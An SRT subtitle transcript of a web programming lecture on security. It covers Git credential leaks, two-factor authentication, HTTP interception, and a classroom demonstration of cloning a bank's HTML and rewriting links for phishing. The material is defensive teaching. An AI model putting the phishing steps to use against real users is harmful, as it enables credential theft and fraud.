1
00:00:00,000 --> 00:00:03,920
[MUSIC PLAYING]

2
00:00:03,920 --> 00:00:15,647


3
00:00:15,647 --> 00:00:18,980
BRIAN YU: Welcome back, everyone, to Web
Programming with Python and JavaScript,

4
00:00:18,980 --> 00:00:20,510
and welcome to our final lecture.

5
00:00:20,510 --> 00:00:23,180
So we've talked about a lot over
the course of web programming

6
00:00:23,180 --> 00:00:24,305
with Python and JavaScript.

7
00:00:24,305 --> 00:00:26,840
Everything from version
control to designing

8
00:00:26,840 --> 00:00:29,420
what a web page looks
like using HTML and CSS,

9
00:00:29,420 --> 00:00:32,299
and then moving into programming
languages like Python and JavaScript

10
00:00:32,299 --> 00:00:34,965
that are used on the server side
and on the client side in order

11
00:00:34,965 --> 00:00:37,180
to build and design web applications.

12
00:00:37,180 --> 00:00:39,110
And where I thought
we'd conclude today is

13
00:00:39,110 --> 00:00:41,630
by talking a little bit about
security, about making sure

14
00:00:41,630 --> 00:00:43,760
that our web applications
are secure, thinking

15
00:00:43,760 --> 00:00:46,250
about what sorts of
security vulnerabilities

16
00:00:46,250 --> 00:00:48,629
can come about when we're
thinking about web applications

17
00:00:48,629 --> 00:00:50,420
and deploying them to
the internet, and how

18
00:00:50,420 --> 00:00:53,630
we can best defend against
those potential vulnerabilities.

19
00:00:53,630 --> 00:00:56,644
And in doing so, we'll be taking
a look back at all of the topics

20
00:00:56,644 --> 00:00:58,560
that we've talked about
so far in this course,

21
00:00:58,560 --> 00:01:03,290
going from Git to HTML, to looking
at Flask, SQL, our API design,

22
00:01:03,290 --> 00:01:07,130
thinking about programming in JavaScript
using Django as a library later on,

23
00:01:07,130 --> 00:01:10,790
testing with continuous integration
and continuous deployment, in addition

24
00:01:10,790 --> 00:01:11,720
to scalability.

25
00:01:11,720 --> 00:01:14,570
And looking through all of
these past topics one at a time,

26
00:01:14,570 --> 00:01:17,540
and thinking about where
security vulnerabilities might

27
00:01:17,540 --> 00:01:20,570
arise in any of these potential
areas, and how we might start

28
00:01:20,570 --> 00:01:22,220
to think about defending against them.

29
00:01:22,220 --> 00:01:24,470
Some of these things will
be things we have alluded to

30
00:01:24,470 --> 00:01:27,899
or talked about a little bit over
the course of the semester so far.

31
00:01:27,899 --> 00:01:29,690
But today, we'll really
take an opportunity

32
00:01:29,690 --> 00:01:31,940
to look at all of these
topics in a little more depth

33
00:01:31,940 --> 00:01:36,080
and think about what security
vulnerabilities could come up

34
00:01:36,080 --> 00:01:40,084
in the process of dealing with any
of these areas within a web program.

35
00:01:40,084 --> 00:01:43,250
So where I thought we'd start is at the
very beginning by talking about Git.

36
00:01:43,250 --> 00:01:46,280
So we began the semester by
talking about version control using

37
00:01:46,280 --> 00:01:49,037
Git and GitHub, in particular,
as a way of hosting code

38
00:01:49,037 --> 00:01:51,620
online in a place where different
people from around the world

39
00:01:51,620 --> 00:01:56,250
can have shared access to a repository
of code where they can push code to it.

40
00:01:56,250 --> 00:01:59,150
Or they can pull code from it using
different branches and features

41
00:01:59,150 --> 00:02:01,880
like pull requests in order
to better collaborate on code.

42
00:02:01,880 --> 00:02:05,594
And GitHub is really built upon
this idea of open-source software,

43
00:02:05,594 --> 00:02:07,760
of software where the code
isn't hidden from people,

44
00:02:07,760 --> 00:02:11,180
but is available for potentially anyone
who wants to to look at that code,

45
00:02:11,180 --> 00:02:15,260
to see that code, and if they want to,
propose pull requests or suggestions

46
00:02:15,260 --> 00:02:16,820
or changes to that code.

47
00:02:16,820 --> 00:02:20,120
And so let's think about open-source
software just as a high level idea

48
00:02:20,120 --> 00:02:21,050
right now.

49
00:02:21,050 --> 00:02:24,140
What are some security benefits
of open-source software,

50
00:02:24,140 --> 00:02:27,020
and what are some potential
security concerns that might arise?

51
00:02:27,020 --> 00:02:30,810


52
00:02:30,810 --> 00:02:31,310
Sure.

53
00:02:31,310 --> 00:02:33,884
AUDIENCE: That lots of people
can see it on both sides.

54
00:02:33,884 --> 00:02:34,550
BRIAN YU: Great.

55
00:02:34,550 --> 00:02:35,780
Lots of people can see it--

56
00:02:35,780 --> 00:02:37,190
AUDIENCE: But they'll fix bugs.

57
00:02:37,190 --> 00:02:37,430
BRIAN YU: Right.

58
00:02:37,430 --> 00:02:39,200
And that has implications
on both sides of things

59
00:02:39,200 --> 00:02:41,765
when it comes to bugs, which means that
when you have a lot of different eyes

60
00:02:41,765 --> 00:02:44,810
all looking at the same code, there's
a possibility that someone else might

61
00:02:44,810 --> 00:02:47,460
catch a bug that you missed when
you were writing the software.

62
00:02:47,460 --> 00:02:49,209
But on the flip side
of course, if someone

63
00:02:49,209 --> 00:02:51,950
is able to spot a vulnerability
in your code by reading it

64
00:02:51,950 --> 00:02:55,158
and they don't tell you about it or any
of the other maintainers of the code,

65
00:02:55,158 --> 00:02:57,710
now they're potentially able
to take advantage of a security

66
00:02:57,710 --> 00:03:00,440
exploit in your code, something
you didn't see coming before.

67
00:03:00,440 --> 00:03:02,690
And something that they wouldn't
have otherwise known about

68
00:03:02,690 --> 00:03:04,106
had the code not been open-source.

69
00:03:04,106 --> 00:03:06,266
So open-source software
in that sense can sort of

70
00:03:06,266 --> 00:03:09,515
be a double-edged sword where you have
to be careful that with a lot of people

71
00:03:09,515 --> 00:03:12,680
all looking at the code, there's
potential both for a lot of people

72
00:03:12,680 --> 00:03:15,470
to be able to help you in
finding bugs and making security

73
00:03:15,470 --> 00:03:17,570
improvements to your
code, but also areas

74
00:03:17,570 --> 00:03:19,540
where there might be vulnerabilities.

75
00:03:19,540 --> 00:03:21,500
And over the course of
today, we'll be looking

76
00:03:21,500 --> 00:03:25,430
at some of those potential
vulnerabilities that can exist inside

77
00:03:25,430 --> 00:03:28,940
of our web programs and
taking a look at how we might

78
00:03:28,940 --> 00:03:31,820
start to try to defend against them.

79
00:03:31,820 --> 00:03:33,890
What other security
considerations might come up

80
00:03:33,890 --> 00:03:36,150
when we're using Git and
GitHub, in particular?

81
00:03:36,150 --> 00:03:38,150
If we're hosting our
code online, you might

82
00:03:38,150 --> 00:03:41,150
think that with open-source
software, we might be able to just

83
00:03:41,150 --> 00:03:42,544
make our repositories private.

84
00:03:42,544 --> 00:03:44,960
So GitHub has the option of
making repositories private so

85
00:03:44,960 --> 00:03:47,520
that only certain people have
access to your repository.

86
00:03:47,520 --> 00:03:49,770
So not everyone can potentially see it.

87
00:03:49,770 --> 00:03:51,850
But what dangers still
might arise there?

88
00:03:51,850 --> 00:03:55,620


89
00:03:55,620 --> 00:03:58,871
Multiple possibilities.

90
00:03:58,871 --> 00:03:59,370
Sure?

91
00:03:59,370 --> 00:04:01,595
AUDIENCE: Someone had access
to your GitHub account.

92
00:04:01,595 --> 00:04:02,220
BRIAN YU: Sure.

93
00:04:02,220 --> 00:04:04,094
If someone had access
to your GitHub account,

94
00:04:04,094 --> 00:04:05,840
all your code is now stored online.

95
00:04:05,840 --> 00:04:08,000
Which means if some
enterprising hacker is

96
00:04:08,000 --> 00:04:09,840
able to somehow gain
access to your account,

97
00:04:09,840 --> 00:04:11,700
then they might be able
to take advantage of that.

98
00:04:11,700 --> 00:04:13,640
And so for a long time,
most websites have

99
00:04:13,640 --> 00:04:15,920
operated under a model
of username and password

100
00:04:15,920 --> 00:04:18,079
being the way that you
log in to a website.

101
00:04:18,079 --> 00:04:21,500
And increasingly, there are
ways that hackers try and bypass

102
00:04:21,500 --> 00:04:23,270
that, by trying to
either guess passwords,

103
00:04:23,270 --> 00:04:27,870
by guessing frequently used
passwords, or by trying to just guess

104
00:04:27,870 --> 00:04:29,870
many, many different
passwords, trying thousands

105
00:04:29,870 --> 00:04:31,786
or millions of different
password combinations

106
00:04:31,786 --> 00:04:34,700
in the hopes of at least getting
access to some person's account.

107
00:04:34,700 --> 00:04:37,970
And so if hackers are doing that, trying
to guess at passwords very quickly

108
00:04:37,970 --> 00:04:40,250
in order to try and gain
access to accounts, what can

109
00:04:40,250 --> 00:04:43,686
web applications do in order
to defend against that?

110
00:04:43,686 --> 00:04:45,560
In order to defend
against hackers that might

111
00:04:45,560 --> 00:04:49,620
be trying to get into other
users' accounts unauthorized.

112
00:04:49,620 --> 00:04:50,120
Sure?

113
00:04:50,120 --> 00:04:53,620
AUDIENCE: They could do things
like only so many misses.

114
00:04:53,620 --> 00:04:57,620
You can only have so many wrong or
perhaps another kind of authentication,

115
00:04:57,620 --> 00:04:58,240
also.

116
00:04:58,240 --> 00:04:58,580
BRIAN YU: Great.

117
00:04:58,580 --> 00:04:59,960
So different possibilities exist.

118
00:04:59,960 --> 00:05:02,480
One might be placing a
limit on the number of times

119
00:05:02,480 --> 00:05:04,340
you can try to log in
in any period of time.

120
00:05:04,340 --> 00:05:07,230
Maybe you can only log in, or
attempt to log in, five times,

121
00:05:07,230 --> 00:05:08,450
and if you miss five
times, then you have

122
00:05:08,450 --> 00:05:11,710
to wait potentially an hour until you're
able to log in again, for instance.

123
00:05:11,710 --> 00:05:13,100
So many applications do that.

124
00:05:13,100 --> 00:05:15,900
And then you also talked about
other authentication systems.

125
00:05:15,900 --> 00:05:20,970
So what other authentication
systems could there be?

126
00:05:20,970 --> 00:05:24,372
AUDIENCE: So like the the thing where
you get a code pushed to your phone

127
00:05:24,372 --> 00:05:24,974
somehow.

128
00:05:24,974 --> 00:05:25,640
BRIAN YU: Great.

129
00:05:25,640 --> 00:05:27,840
So an increasingly popular
form of authentication

130
00:05:27,840 --> 00:05:29,660
now is two-factor authentication.

131
00:05:29,660 --> 00:05:32,744
The idea that it's not just enough to
log in with a username and password,

132
00:05:32,744 --> 00:05:35,410
but you might also want to log
in with something else, something

133
00:05:35,410 --> 00:05:37,910
that is physically on you,
like a phone for instance.

134
00:05:37,910 --> 00:05:40,250
Where, after you type in
your username and password,

135
00:05:40,250 --> 00:05:43,250
a code is texted to your phone,
or you use an app on your phone

136
00:05:43,250 --> 00:05:46,440
in order to get a special code, and
then you have to type in that code.

137
00:05:46,440 --> 00:05:49,580
So that even if an attacker
potentially knows your password,

138
00:05:49,580 --> 00:05:52,220
either by hacking into some
database and finding the password

139
00:05:52,220 --> 00:05:54,260
or just by guessing it
luckily, they're still

140
00:05:54,260 --> 00:05:56,300
not going to be able to access
your account because they still

141
00:05:56,300 --> 00:05:59,460
have this added step of having to go
through some two-factor authentication

142
00:05:59,460 --> 00:05:59,960
code.

143
00:05:59,960 --> 00:06:02,510
Where they now need to type
in a particular code that

144
00:06:02,510 --> 00:06:05,180
is only available to someone
that physically owns the device,

145
00:06:05,180 --> 00:06:06,020
like a phone.

146
00:06:06,020 --> 00:06:08,680
And that can also help to
improve security as well.

147
00:06:08,680 --> 00:06:12,030
And so GitHub, for instance, has
an opt-in two-factor authentication

148
00:06:12,030 --> 00:06:13,849
where you can enable
that for your account

149
00:06:13,849 --> 00:06:15,890
in order to make your
GitHub account more secure.

150
00:06:15,890 --> 00:06:18,860
And other websites are increasingly
offering two-factor authentication

151
00:06:18,860 --> 00:06:22,430
as well, as just an additional means
of trying to secure your accounts.

152
00:06:22,430 --> 00:06:27,420
And web applications are beginning to
use that as a security measure as well.

153
00:06:27,420 --> 00:06:30,770
But let's think more broadly, not just
about GitHub, but about Git in general,

154
00:06:30,770 --> 00:06:33,080
and this idea of version
control and making changes

155
00:06:33,080 --> 00:06:35,060
and committing and saving those changes.

156
00:06:35,060 --> 00:06:38,865
And when we're thinking about
pushing our commits to the internet,

157
00:06:38,865 --> 00:06:41,240
taking our changes that we've
made in a GitHub repository

158
00:06:41,240 --> 00:06:43,280
and pushing them online,
we want to be careful

159
00:06:43,280 --> 00:06:46,670
that sensitive information
like a password or an access

160
00:06:46,670 --> 00:06:50,222
token for some service doesn't
end up inside of a repository.

161
00:06:50,222 --> 00:06:53,180
Because if it does, then if it gets
pushed online regardless of whether

162
00:06:53,180 --> 00:06:56,346
that repository is public or not, then
there's a potential that other people

163
00:06:56,346 --> 00:07:00,020
might be able to see that access
token when they probably shouldn't.

164
00:07:00,020 --> 00:07:03,710
And so imagine a situation where
you're working on a repository.

165
00:07:03,710 --> 00:07:07,430
And you've made some commits
and maybe accidentally, you

166
00:07:07,430 --> 00:07:09,410
put a password or some
access token that you

167
00:07:09,410 --> 00:07:12,650
didn't mean to inside of one of the
files, and you commit that file.

168
00:07:12,650 --> 00:07:15,650
And so credentials have now been
exposed in one of the commits inside

169
00:07:15,650 --> 00:07:16,744
of your repository.

170
00:07:16,744 --> 00:07:19,160
And then later on down the
line, you realize that mistake.

171
00:07:19,160 --> 00:07:21,860
You realize, oh, wait a minute, I put
credentials inside that repository

172
00:07:21,860 --> 00:07:23,450
when I probably shouldn't have.

173
00:07:23,450 --> 00:07:26,330
And you make another commit removing
those credentials from the file.

174
00:07:26,330 --> 00:07:28,770
So you add another commit,
removing those credentials.

175
00:07:28,770 --> 00:07:33,110
And now those credentials are no
longer in the head of the repository.

176
00:07:33,110 --> 00:07:35,540
You've taken them out, you've
committed that removal.

177
00:07:35,540 --> 00:07:38,191
Is that secure?

178
00:07:38,191 --> 00:07:38,690
No.

179
00:07:38,690 --> 00:07:39,689
I see you shaking heads.

180
00:07:39,689 --> 00:07:40,410
Why not?

181
00:07:40,410 --> 00:07:42,560
AUDIENCE: Because you
can see all the history.

182
00:07:42,560 --> 00:07:42,830
BRIAN YU: Great.

183
00:07:42,830 --> 00:07:45,860
Because of Git's version control system,
the fact that it's saving every time

184
00:07:45,860 --> 00:07:47,870
you make a commit, it's
saving your entire history.

185
00:07:47,870 --> 00:07:50,510
Which means that even though--
if you look at all of your files

186
00:07:50,510 --> 00:07:51,800
in their current state now--

187
00:07:51,800 --> 00:07:55,340
those credentials are not there, anyone
who has access to that repository

188
00:07:55,340 --> 00:07:57,230
has access to the full
history of commits.

189
00:07:57,230 --> 00:07:59,950
They can go back and look at
your previous commit messages,

190
00:07:59,950 --> 00:08:03,200
the previous files you've changed, and
what your files looked like every stage

191
00:08:03,200 --> 00:08:04,200
along the way.

192
00:08:04,200 --> 00:08:07,610
And so once you've exposed
those credentials, now

193
00:08:07,610 --> 00:08:09,470
even if you make another
commit after that,

194
00:08:09,470 --> 00:08:11,250
those credentials are
still going to be there.

195
00:08:11,250 --> 00:08:12,666
And so there are ways around this.

196
00:08:12,666 --> 00:08:16,610
There are ways of reverting back to a
previous commit and pruning away all

197
00:08:16,610 --> 00:08:20,270
the extra commits, and then what we
would call force pushing those commits

198
00:08:20,270 --> 00:08:21,920
back to GitHub in order to update it.

199
00:08:21,920 --> 00:08:24,404
But generally, once you've
pushed code to GitHub,

200
00:08:24,404 --> 00:08:27,320
you might want to imagine all of
that code as potentially compromised.

201
00:08:27,320 --> 00:08:29,570
So if you had passwords
or security credentials

202
00:08:29,570 --> 00:08:32,270
or other keys inside of your
repository that you accidentally

203
00:08:32,270 --> 00:08:35,669
pushed to GitHub, probably a good idea
to just exchange those credentials

204
00:08:35,669 --> 00:08:38,510
altogether in order to
get new ones because there

205
00:08:38,510 --> 00:08:41,419
is the potential that those
credentials could be compromised once

206
00:08:41,419 --> 00:08:42,606
they're pushed.

207
00:08:42,606 --> 00:08:44,480
And so those are some
security considerations

208
00:08:44,480 --> 00:08:47,600
that might come about when we're
thinking about Git and GitHub.

209
00:08:47,600 --> 00:08:51,184
But let's take a look now to actually
writing code and taking a look at HTML.

210
00:08:51,184 --> 00:08:54,100
So HTML, remember we were using in
the very beginning of this semester

211
00:08:54,100 --> 00:08:56,990
and all throughout the semester
in order to design web pages

212
00:08:56,990 --> 00:09:00,920
and were just consisting of tags where
we had our body tags and different tags

213
00:09:00,920 --> 00:09:03,080
for creating lists or
creating forms or creating

214
00:09:03,080 --> 00:09:04,980
buttons and so on and so forth.

215
00:09:04,980 --> 00:09:09,270
What security vulnerabilities might
come about from just purely HTML?

216
00:09:09,270 --> 00:09:13,580
Or how might HTML be used to
trick users into doing something

217
00:09:13,580 --> 00:09:17,550
that a malicious attacker
might want them to do?

218
00:09:17,550 --> 00:09:18,050
Yeah?

219
00:09:18,050 --> 00:09:24,284
AUDIENCE: In browser, we can see
HTML by going to [INAUDIBLE]..

220
00:09:24,284 --> 00:09:24,950
BRIAN YU: Great.

221
00:09:24,950 --> 00:09:28,010
Inside of a browser, for instance,
you can inspect at a website,

222
00:09:28,010 --> 00:09:29,870
and you can take a look
at all of the code.

223
00:09:29,870 --> 00:09:31,590
And so what are the
implications of that?

224
00:09:31,590 --> 00:09:35,390
Well, that means that if I wanted to, I
could, for instance, go into my browser

225
00:09:35,390 --> 00:09:38,574
and go to, I don't know,
bankofamerica.com for instance.

226
00:09:38,574 --> 00:09:41,240
And I could pull up, OK, here's
Bank of America's website, which

227
00:09:41,240 --> 00:09:44,570
is really just HTML that's
been rendered onto my screen.

228
00:09:44,570 --> 00:09:47,540
And if I wanted to know what code
is Bank of America using in order

229
00:09:47,540 --> 00:09:50,090
to make any of this stuff
happen, I could reasonably

230
00:09:50,090 --> 00:09:54,060
control click on the site,
click on View Page Source,

231
00:09:54,060 --> 00:09:57,464
and what that pulls up for
me is a whole bunch of HTML.

232
00:09:57,464 --> 00:10:00,380
It's a whole bunch of it, and I don't
really know what all of it does.

233
00:10:00,380 --> 00:10:03,530
But if I just take it all
and copy it to my clipboard,

234
00:10:03,530 --> 00:10:07,670
and I go into a text editor
and create a new file--

235
00:10:07,670 --> 00:10:10,670
I'll call it bank.html--

236
00:10:10,670 --> 00:10:13,310
and I'm just going to
paste in all of that code

237
00:10:13,310 --> 00:10:15,530
that I just copied off
Bank of America's website.

238
00:10:15,530 --> 00:10:18,405
I didn't have to write any of it,
just copied it straight from there.

239
00:10:18,405 --> 00:10:22,560
Now if I go ahead and open
bank.html, this file I just created,

240
00:10:22,560 --> 00:10:24,980
now I've effectively recreated
Bank of America's website

241
00:10:24,980 --> 00:10:26,540
just by copying their HTML.

242
00:10:26,540 --> 00:10:29,810
And if I now host this from my
own web server, for instance,

243
00:10:29,810 --> 00:10:32,907
I might be able to trick unsuspecting
users into thinking that this

244
00:10:32,907 --> 00:10:34,490
is actually Bank of America's website.

245
00:10:34,490 --> 00:10:37,615
Because just at first glance, it looks
quite reasonably like the same thing

246
00:10:37,615 --> 00:10:39,530
because it's the exact same HTML.

247
00:10:39,530 --> 00:10:41,420
And if I'm really
enterprising, I can think

248
00:10:41,420 --> 00:10:43,753
about actually trying to make
modifications to this code

249
00:10:43,753 --> 00:10:48,520
in order to even better be able to
try and maliciously take advantage

250
00:10:48,520 --> 00:10:51,020
of a user who might unsuspectingly
be arriving at this site,

251
00:10:51,020 --> 00:10:54,650
not realizing that it's not the
actual Bank of America website.

252
00:10:54,650 --> 00:10:57,830
I might, for instance, take
this Forgot Passcode button

253
00:10:57,830 --> 00:11:00,320
down here-- which is
probably a link to some page

254
00:11:00,320 --> 00:11:02,990
where they might type in their
email address or try and type

255
00:11:02,990 --> 00:11:05,420
in some new passcode that
they want for instance--

256
00:11:05,420 --> 00:11:08,750
and I might just take this
HTML file, and I'll just

257
00:11:08,750 --> 00:11:12,440
search for forgot passcode.

258
00:11:12,440 --> 00:11:13,520
And OK, here it is.

259
00:11:13,520 --> 00:11:14,840
Here's forgot passcode.

260
00:11:14,840 --> 00:11:19,950
And if we notice, it's located
inside of an a tag-- an anchor tag--

261
00:11:19,950 --> 00:11:23,270
which has this href
attribute, which is going

262
00:11:23,270 --> 00:11:26,390
to be where the user is linked
to if they were to ever click on

263
00:11:26,390 --> 00:11:28,260
that I forgot my password button.

264
00:11:28,260 --> 00:11:31,940
And so if I take this link, this
secure.bankofamerica.com/login

265
00:11:31,940 --> 00:11:36,720
something, and instead of linking
to that, link to, I don't know,

266
00:11:36,720 --> 00:11:41,600
htps cs50.github.io/web or whatever
other page I want to redirect the user

267
00:11:41,600 --> 00:11:42,740
to.

268
00:11:42,740 --> 00:11:46,479
Now if I refresh the site, it looks like
Bank of America's website once again,

269
00:11:46,479 --> 00:11:49,520
but when they go over here and they
try and click on this Forgot Passcode

270
00:11:49,520 --> 00:11:52,566
button, now they're taken to
our website or whatever website

271
00:11:52,566 --> 00:11:53,690
I want to take the user to.

272
00:11:53,690 --> 00:11:57,350
I can modify the HTML that they have
in order to direct them anywhere.

273
00:11:57,350 --> 00:12:00,230
And so that's sort of
one of the common ways

274
00:12:00,230 --> 00:12:03,560
that attackers are able to use
HTML to try and trick users

275
00:12:03,560 --> 00:12:04,689
into doing something.

276
00:12:04,689 --> 00:12:06,980
In particular, noting the
fact that you can take a link

277
00:12:06,980 --> 00:12:08,930
and make it look like it's
going anywhere, but really

278
00:12:08,930 --> 00:12:10,638
take the user to
somewhere that you want.

279
00:12:10,638 --> 00:12:15,620
I can have something like this where
if I just have a href equals url1--

280
00:12:15,620 --> 00:12:19,130
where url1 is where I want
the user to be taken to

281
00:12:19,130 --> 00:12:23,640
and url2 is just the text
that appears to the user--

282
00:12:23,640 --> 00:12:25,880
then the user might
reasonably be tricked

283
00:12:25,880 --> 00:12:30,390
into thinking that they're going to url2
when in reality, they're going to url1.

284
00:12:30,390 --> 00:12:36,970
And so a simple example of that
might be inside of link.html here.

285
00:12:36,970 --> 00:12:38,750
We're in link.html.

286
00:12:38,750 --> 00:12:42,140
It's a very simple HTML website,
where on inside of my body tag,

287
00:12:42,140 --> 00:12:44,870
I have an anchor tag, which
is just going to be a link.

288
00:12:44,870 --> 00:12:48,870
And the href of that link is this
course's website, for instance.

289
00:12:48,870 --> 00:12:53,870
But in between the a tags, what I
have is just google.com, for instance.

290
00:12:53,870 --> 00:12:58,460
And so what that means is that
if I were to open up link.html,

291
00:12:58,460 --> 00:13:02,150
for instance, what the user
sees is something like this,

292
00:13:02,150 --> 00:13:03,890
a page that just has a link to Google.

293
00:13:03,890 --> 00:13:05,690
And they might reasonably think
that clicking on that link

294
00:13:05,690 --> 00:13:08,606
should take them to Google when in
fact, when they click on that link,

295
00:13:08,606 --> 00:13:10,950
they're taken here instead,
to the course web page.

296
00:13:10,950 --> 00:13:12,866
And so you can imagine
how this might actually

297
00:13:12,866 --> 00:13:15,520
be able to be used in order
to create potential exploits.

298
00:13:15,520 --> 00:13:18,470
So that if someone were to
take Bank of America's URL,

299
00:13:18,470 --> 00:13:22,910
and I go to link.html and say, all
right, we'll put Bank of America here,

300
00:13:22,910 --> 00:13:26,640
and in the href, instead
put bank.html, for instance,

301
00:13:26,640 --> 00:13:31,550
which is the link to the file that I
created copying Bank of America's code.

302
00:13:31,550 --> 00:13:37,490
Now suddenly, when I
open up link.html, I

303
00:13:37,490 --> 00:13:40,190
get a link that looks like it
is linking to Bank of America.

304
00:13:40,190 --> 00:13:41,981
I click on that link,
and I get a page that

305
00:13:41,981 --> 00:13:43,730
looks like Bank of America's website.

306
00:13:43,730 --> 00:13:46,855
And if I click on forgot my passcode,
now I'm redirected to some other side

307
00:13:46,855 --> 00:13:47,390
altogether.

308
00:13:47,390 --> 00:13:51,540
And so these are common
ways that exploits

309
00:13:51,540 --> 00:13:54,290
are able to happen by taking
advantage of security vulnerabilities

310
00:13:54,290 --> 00:13:57,350
like this where we're really just
relying on people not being aware

311
00:13:57,350 --> 00:13:59,510
of the fact that clicking
on a link might take them

312
00:13:59,510 --> 00:14:01,477
to somewhere else different altogether.

313
00:14:01,477 --> 00:14:03,560
And so how do you defend
against things like this?

314
00:14:03,560 --> 00:14:05,210
Well, one good strategy
from the user end

315
00:14:05,210 --> 00:14:07,668
is just to be careful about
the links that you're clicking.

316
00:14:07,668 --> 00:14:10,910
In Chrome, for instance, if you hover
over a link, down in the lower left,

317
00:14:10,910 --> 00:14:12,279
you can see this--

318
00:14:12,279 --> 00:14:14,570
it's in small text, so you
might not be able to see it,

319
00:14:14,570 --> 00:14:17,519
but this is the actual link that
this link is going to be going to.

320
00:14:17,519 --> 00:14:19,310
So you can't always
trust what the text is.

321
00:14:19,310 --> 00:14:22,643
You might want to look very carefully at
where that link is actually taking you.

322
00:14:22,643 --> 00:14:26,330
And so these are just some examples
of HTML being used in order

323
00:14:26,330 --> 00:14:29,600
to create potential security exploits.

324
00:14:29,600 --> 00:14:31,776
Questions about any of that so far?

325
00:14:31,776 --> 00:14:32,276
Yeah?

326
00:14:32,276 --> 00:14:37,510
AUDIENCE: So why does our
browser allow us to see a source

327
00:14:37,510 --> 00:14:38,699
code in the first place?

328
00:14:38,699 --> 00:14:39,740
BRIAN YU: Great question.

329
00:14:39,740 --> 00:14:43,050
Why do web browsers allow us to see
the source code in the first place?

330
00:14:43,050 --> 00:14:47,210
Well, in a sense, the web browser,
what it's getting is the source code.

331
00:14:47,210 --> 00:14:50,510
So when a web browser is making
a request to bankofamerica.com,

332
00:14:50,510 --> 00:14:55,760
for instance, bankofamerica.com needs
to give back information to my computer.

333
00:14:55,760 --> 00:14:58,375
And that information needs
to be the code, the HTML,

334
00:14:58,375 --> 00:14:59,750
that is going to render the page.

335
00:14:59,750 --> 00:15:03,740
So hypothetically, a browser might
be able to just not make it easily

336
00:15:03,740 --> 00:15:05,480
accessible to get to that source code.

337
00:15:05,480 --> 00:15:07,610
But anyone who wants to, if
you're really enterprising,

338
00:15:07,610 --> 00:15:10,340
could just look at the information
that's coming back from the server.

339
00:15:10,340 --> 00:15:13,200
That information will contain the
source code one way or another.

340
00:15:13,200 --> 00:15:15,710
So there's really no way to hide it.

341
00:15:15,710 --> 00:15:16,646
Good question, though.

342
00:15:16,646 --> 00:15:19,611


343
00:15:19,611 --> 00:15:20,110
All right.

344
00:15:20,110 --> 00:15:24,550
So that was HTML being used in
order to create potential security

345
00:15:24,550 --> 00:15:26,771
vulnerabilities or security exploits.

346
00:15:26,771 --> 00:15:29,770
Let's take a look now, by moving on
one week, and talking about a Flask.

347
00:15:29,770 --> 00:15:33,430
So we talked about moving on from
just creating static web pages that

348
00:15:33,430 --> 00:15:37,330
are displaying HTML content to using the
web server, where we're communicating

349
00:15:37,330 --> 00:15:40,510
between the server and the user,
sending packets of information

350
00:15:40,510 --> 00:15:41,440
along the internet.

351
00:15:41,440 --> 00:15:44,148
And as soon as we start dealing
with that, packets of information

352
00:15:44,148 --> 00:15:46,850
going from one server to a
client, traveling between routers,

353
00:15:46,850 --> 00:15:49,940
now we start to deal with other
security concerns as well.

354
00:15:49,940 --> 00:15:53,590
So here, we'll start to talk about
HTTP, Hypertext Transfer Protocol, which

355
00:15:53,590 --> 00:15:57,130
is typically used to send packets
of information across the internet,

356
00:15:57,130 --> 00:16:00,610
as well as HTTPS, which is a more
secure version of that, which

357
00:16:00,610 --> 00:16:03,170
we'll take a look at in just a moment.

358
00:16:03,170 --> 00:16:04,855
So let's imagine this diagram.

359
00:16:04,855 --> 00:16:06,730
I have one computer
here, maybe it's a server

360
00:16:06,730 --> 00:16:08,554
running some Flask web application.

361
00:16:08,554 --> 00:16:10,720
And I have a client over
here, which is maybe asking

362
00:16:10,720 --> 00:16:12,520
for information from that web server.

363
00:16:12,520 --> 00:16:14,350
In other words, I've
got two computers that

364
00:16:14,350 --> 00:16:16,934
need to communicate with each
other over the internet somehow.

365
00:16:16,934 --> 00:16:19,433
And maybe they've never
communicated with each other before,

366
00:16:19,433 --> 00:16:21,367
so they need to talk
to each other somehow.

367
00:16:21,367 --> 00:16:23,950
And so this computer might want
to send packets of information

368
00:16:23,950 --> 00:16:24,887
to the other computer.

369
00:16:24,887 --> 00:16:27,970
But of course, that information doesn't
go to the other computer directly.

370
00:16:27,970 --> 00:16:30,010
It needs to travel over
the internet, traveling

371
00:16:30,010 --> 00:16:32,770
between different routers and
different servers for instance,

372
00:16:32,770 --> 00:16:35,012
before it gets from point
A to point B. And likewise,

373
00:16:35,012 --> 00:16:37,720
when information wants to come
back from that computer over there

374
00:16:37,720 --> 00:16:40,240
to this computer, we also
need to have information

375
00:16:40,240 --> 00:16:42,970
that is traveling through the
internet that's potentially going

376
00:16:42,970 --> 00:16:45,190
to all of these routers in between.

377
00:16:45,190 --> 00:16:47,480
And so just looking at
this diagram, what's

378
00:16:47,480 --> 00:16:52,343
a security vulnerability that seems
clear just from a basic perspective?

379
00:16:52,343 --> 00:16:55,794


380
00:16:55,794 --> 00:16:56,780
Yeah?

381
00:16:56,780 --> 00:17:01,294
AUDIENCE: Changing HTTP header could--

382
00:17:01,294 --> 00:17:01,960
BRIAN YU: Great.

383
00:17:01,960 --> 00:17:03,200
So changing HTTP headers.

384
00:17:03,200 --> 00:17:06,760
That's an interesting thought, that if
this request is getting passed from--

385
00:17:06,760 --> 00:17:09,450
a request goes from this computer
through all these routers

386
00:17:09,450 --> 00:17:12,510
into this computer, potentially,
one of the servers in the middle,

387
00:17:12,510 --> 00:17:16,344
one of these routers, might be able
to change that request, for instance,

388
00:17:16,344 --> 00:17:19,260
in order to try and make a request
that's slightly different than what

389
00:17:19,260 --> 00:17:20,670
the original user wanted.

390
00:17:20,670 --> 00:17:23,400
Or likewise, because any of
these intermediary routers

391
00:17:23,400 --> 00:17:27,089
have access to the full contents
of whatever request is being passed

392
00:17:27,089 --> 00:17:30,550
or response is being passed back and
forth between these two computers,

393
00:17:30,550 --> 00:17:34,554
anyone in the middle of this process
could potentially take that information

394
00:17:34,554 --> 00:17:35,470
and have access to it.

395
00:17:35,470 --> 00:17:37,340
They could read an
email that's being sent

396
00:17:37,340 --> 00:17:40,650
or the contents of a web page response
that's being sent from one computer

397
00:17:40,650 --> 00:17:43,090
to the other because that
packet of information

398
00:17:43,090 --> 00:17:45,610
is just traveling over the internet.

399
00:17:45,610 --> 00:17:47,895
So how do we solve that problem?

400
00:17:47,895 --> 00:17:48,805
Yeah?

401
00:17:48,805 --> 00:17:50,170
AUDIENCE: Encrypt traffic.

402
00:17:50,170 --> 00:17:50,950
BRIAN YU: Encrypt traffic.

403
00:17:50,950 --> 00:17:51,450
Great.

404
00:17:51,450 --> 00:17:54,490
Cryptography is this idea of encrypting
